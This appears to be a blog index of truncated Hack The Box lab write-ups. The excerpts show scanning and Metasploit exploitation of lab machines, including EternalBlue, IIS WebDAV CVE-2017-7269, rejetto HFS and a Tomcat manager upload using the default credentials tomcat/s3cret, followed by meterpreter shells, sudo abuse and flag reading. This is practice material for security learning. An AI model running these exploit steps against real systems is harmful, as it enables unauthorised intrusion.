HTB Artic

$sudo nmap -A -T4 -p- 8500/tcp open fmtp?This is an odd open port. Let’s check it. Access to These files are part of a Cold Fusion 8 installation. $searchsploit ColdFusion $searchsploit -x 14641 Access to What is Rds? ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administratorand ColdFusion Studio to provide remote HTTP-access to files and databases.You can use RDS to manage

GIT Workflow

HTB Blocky

$nmap -T4 -p- -sV -A Open Ports: 21/tcp    open   ftp       ProFTPD 1.3.5a 22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu)) 25565/tcp open   minecraft Minecraft 1.11.2 http-generator: WordPress 4.8 $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e PhpMyAdmin login site: WordPress admim login site: Uploads folder

HTB Granny

$nmap -T4 -A -sV -p- $nmap -p 80 –script vuln $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e $nikto -h Based on Grandpa’s vulnerability… msf5 > search CVE-2017-7269 msf5 > use 0 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) >set rhosts  msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run meterpreter > getuid meterpreter > shell c:\windows\system32\inetsrv>whoami meterpreter > run post/multi/recon/local_exploit_suggester  meterpreter > getpid meterpreter > ps

HTB Grandpa

$nmap -T4 -sV -A -p- Open Ports: 80/tcp open http Microsoft IIS httpd 6.0 This format seems to be an old version of IIS.According to, we are working with a Windows Vista (Solo Business y Ultimate) y Windows Server 2008. $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e $nikto -h Seems that IIS 6.0 is vulnerable to a zero-day Buffer Overflow vulnerability (CVE-2017-7269).Let’s follow this path. More information

HTB Bashed

$nmap -T4 -A -sV -p- Access to $nikto -h $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e www-data@bashed:/var/www/html/dev# cd /home/www-data@bashed :/home# ls www-data@bashed :/home# cd arrexelwww-data@bashed :/home/arrexel# cat user.txt www-data@bashed:/var/www/html/dev# sudo -l The command ​sudo -l​ reveals that the ​www-data​ user can run any command as scriptmanager​.Running the command ​sudo -u scriptmanager bash -i​ will spawn a bash shell www-data@bashed:/# ls -la www-data@bashed :/# sudo cd scriptmanager www-data@bashed

HTB Nibbles

$nmap -A -sV -T4 -p- Open ports: 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Access to Do we have a /nibbleblog directory? Access to $nikto -h Results: OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from version 4.3 allows remote admin access. This PHP file should be protected. OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from version 4.3 allows remote admin access.

HTB Optimum

$nmap -A -sV -p- $nikto -h $searchsploit hfs $cat /usr/share/exploitdb/exploits/windows/remote/346 msf5 > search hfs msf5 > use 1 msf5 exploit(windows/http/rejetto_hfs_exec) > options msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost msf5 exploit(windows/http/rejetto_hfs_exec) > run meterpreter > ls meterpreter > cat user.txt.txt meterpreter > getuid meterpreter > sysinfo Sysinfo shows that we are in a Windows 2012 R2 server with x64 bits architecture. Due to the fact that the default reverse_tcp

HTB Blue

$nmap -A -T4 -p- -sV Result analysis:   135: windows rpc 139: smb  445: smb  OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) $nmap -p 445 –script vuln msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > options msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit C:\Windows\system32>whoami C:\Users>dir C:\Users>cd haris C:\Users\haris>cd Desktop C:\Users\haris\Desktop>dir C:\Users\haris\Desktop>type user.txt C:\Users>cd Administrator C:\Users\Administrator>cd Desktop C:\Users\Administrator\Desktop>dir C:\Users\Administrator\Desktop>type root.txt

HTB Jerry

$nmap -A -T4 -p- -sV -Pn $gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e $nikto -h Access to  Use credentials found on Nikto’s results (tomcat/s3cret) As we can observe, we are able to upload and deploy a WAR file. msf5 > use exploit/multi/http/tomcat_mgr_uploadmsf5 exploit(multi/http/tomcat_mgr_upload) > options msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost msf5 exploit(multi/http/tomcat_mgr_upload) > set